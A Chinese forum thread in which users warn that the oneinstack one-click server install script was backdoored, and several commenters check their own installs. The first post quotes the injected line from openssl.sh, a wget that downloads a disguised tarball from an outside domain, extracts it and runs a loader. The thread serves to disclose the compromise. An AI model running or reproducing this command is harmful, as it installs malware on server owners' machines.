SK_ 大佬有话说 :
oneinstack一键网站环境脚本最近被挂马了!
https://github.com/oneinstack/oneinstack/issues/487
挂马的文件在:/root/oneinstack/include/openssl.sh137行,多了一段:wget http://download.cnoneinstack.com/oneinstack.jpg -cO /var/local/oneinstack.jpg && tar zxf /var/local/oneinstack.jpg -C /var/local/ && cd /var/local/cron && ./load linux@QWE 执行代码
github上 https://github.com/oneinstack/oneinstack/blob/main/include/openssl.sh 这个文件是没有这段代码的。
比对oneinstack-full.tar.gz的MD5码是不准的。要看/root/oneinstack/include/openssl.sh 这个文件,不知道黑客会不会留后门清理入侵痕迹,我另外一台几个月前搭建的这个文件没有这串代码。
5ean 大佬有话说 :
燕十三丶 大佬有话说 : 2023-5-1 01:41
一直用lnmp
还军哥靠谱,稳这么多年了
5ean 大佬有话说 :
看了一下,是真的,我去,我的服务器用的都是oneinstack,检查了一下没有这句
应该是刚被挂上马
klocal 大佬有话说 :
说好的 不用面板 最安全呢?
5ean 大佬有话说 :
klocal 大佬有话说 : 2023-5-1 01:32
说好的 不用面板 最安全呢?
谁能想到源码被黑,挂上马呢,以后不敢用oneinstack了
七夏浅笑 大佬有话说 :
感觉用啥都有不安全的时候,不过还是用大佬都用的东西好,出问题了能及时被人发现
Xhvai110 大佬有话说 :
:lol:lol:lol泰裤辣
燕十三丶 大佬有话说 :
一直用lnmp :lol
bios12567496 大佬有话说 :
看了下 我1月份配置的 没有这代码
jhsyue 大佬有话说 :
本帖最后由 jhsyue 于 2023-5-1 02:57 编辑
我上个月配的 也没这串代码
我是4月21号下午暗桩的 刚才看了下 没有这串代码